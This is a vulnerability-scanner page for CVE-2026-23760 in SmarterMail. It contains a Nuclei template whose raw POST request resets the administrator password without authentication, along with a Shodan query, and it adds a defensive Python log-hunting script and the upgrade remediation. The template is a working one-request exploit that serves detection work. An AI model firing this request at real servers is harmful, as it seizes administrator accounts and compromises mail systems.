SmarterTools SmarterMail - Admin Password Reset
CVE-2026-23760
Verified
Description
Detects a SmarterMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint; a successful response indicates that administrative password resets can be triggered without proper authorization.
Severity
Critical
Published Date
January 22, 2026
Template Author
watchtowr, dhiyaneshdk
CVE-2026-23760.yaml
id: CVE-2026-23760

info:
  name: SmarterTools SmarterMail - Admin Password Reset
  author: watchTowr,DhiyaneshDk
  severity: critical
  description: |
    Detected a SmartMail admin password reset vulnerability by sending a POST request to the `/api/v1/auth/force-reset-password` endpoint, indicating that administrative password resets could potentially be triggered without proper authorization.
  impact: |
    Unauthenticated attackers can reset administrator passwords, leading to full administrative compromise of the system.
  remediation: |
    Upgrade to build 9511 or later.
  reference:
    - https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SmarterMail"
  tags: cve,cve2026,intrusive,smartmail,admin,auth-bypass,vkev,kev

variables:
  password: "{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        POST /api/v1/auth/force-reset-password HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"IsSysAdmin":"true",
        "OldPassword":"watever",
        "Username":"admin",
        "NewPassword":"{{password}}",
        "ConfirmPassword": "{{password}}"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - 'debugInfo'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: dsl
        dsl:
          - '"New Password: " + password'
# digest: 4a0a00473045022075bc7a151ad673dcb658ce533235d67c2ed4910dd7c7b346be8535b6003e35f20221008669e4d8d1250dbbe0ffbb7b727bf10329de1163fc4c76ff4546665575bf303c:922c64590222798bb761d5b6d8e7295
Remediation Steps
Upgrade to build 9511 or later.
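A defender-side companion to the template above, added here and not part of the Nuclei template or of SmarterTools' code: it scans web-server access logs for POSTs to the `/api/v1/auth/force-reset-password` endpoint the template probes and gates on the fixed build number from the remediation. The combined log format and the sample lines are assumptions (constructed, not real traffic).

```python
"""Hunt access logs for hits on the SmarterMail force-reset-password endpoint
(CVE-2026-23760). Added example; assumes an Apache/nginx-style combined log
in front of SmarterMail. Sample lines are constructed."""
import re
from dataclasses import dataclass

RESET_PATH = "/api/v1/auth/force-reset-password"  # endpoint from the template
FIXED_BUILD = 9511                                 # remediation: build 9511 or later

# combined format: ip - - [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

@dataclass(frozen=True)
class Hit:
    ip: str
    time: str
    status: int

def find_reset_attempts(lines):
    """Return one Hit per POST to the reset endpoint. Status 200 is the
    template's success condition; other codes are kept too, since a failed
    probe still tells you someone is trying."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # ignore query string and path case so variants are not missed
        if m["path"].split("?", 1)[0].lower() != RESET_PATH:
            continue
        hits.append(Hit(m["ip"], m["time"], int(m["status"])))
    return hits

def is_vulnerable_build(build):
    """True when the reported SmarterMail build predates the fix."""
    return build < FIXED_BUILD

SAMPLE_LOG = [  # constructed sample lines, not real traffic
    '203.0.113.7 - - [22/Jan/2026:10:01:02 +0000] "GET /interface/root HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [22/Jan/2026:10:01:05 +0000] "POST /api/v1/auth/force-reset-password HTTP/1.1" 200 312 "-" "python-requests/2.31"',
    '198.51.100.2 - - [22/Jan/2026:10:02:11 +0000] "POST /api/v1/auth/login HTTP/1.1" 200 220 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [22/Jan/2026:10:02:40 +0000] "POST /API/v1/auth/force-reset-password?x=1 HTTP/1.1" 401 88 "-" "curl/8.5"',
]

if __name__ == "__main__":
    for h in find_reset_attempts(SAMPLE_LOG):
        print(f"{h.time} {h.ip} POST {RESET_PATH} -> {h.status}")
```

A 200 on this endpoint from a host still below build 9511 should be treated as a probable administrator password reset and handled as an incident, not just a probe.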